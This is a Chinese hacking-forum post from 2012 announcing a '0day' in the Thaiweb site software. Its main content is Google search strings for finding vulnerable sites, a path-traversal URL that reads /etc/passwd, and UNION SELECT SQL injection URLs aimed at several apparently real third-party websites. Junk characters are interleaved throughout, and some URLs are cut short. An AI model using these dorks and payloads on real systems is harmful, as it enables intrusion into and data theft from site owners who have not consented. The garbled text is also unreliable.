找回密码
 立即注册
查看: 2450|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
Google之:
, K! a. T+ N0 ~# R( n2 J
  R' `' h  j4 G* {0 F8 \& b& k( Bintext:powered by Thaiweb
' j7 a- M  B. q2 A# t9 J$ W+ V2 |5 I6 H7 O' V
inurl:index.php?page=board.php1 ~. M& Z5 I3 }9 Q9 I! c' {" }

; ]# K! j& e' ?+ n
# X# y. U+ y! m  b
; [7 U" K' N/ W利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd
. |) A4 E6 A- Y3 E5 R' j0 U1 ]3 t6 B! k& O2 T) i

4 t9 z6 i( i0 H
2 l+ Y6 Z) I) w5 m7 y/ V  R/ q利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'# x& b) m- z  U# ?8 ?

9 @  t, w) e1 E4 T " i8 ]. d6 f; e) d0 R6 A4 `
& N0 n: y9 M; }) f$ g
http://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--9 C. q0 O, K* B  H

' @# u- F6 i- |" E- {http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
' O  d6 o3 I6 b1 F! \% n6 L" r
  v' Y# k8 N( b9 }! H2 F2 Dhttp://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
1 m( p5 o% G. M
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表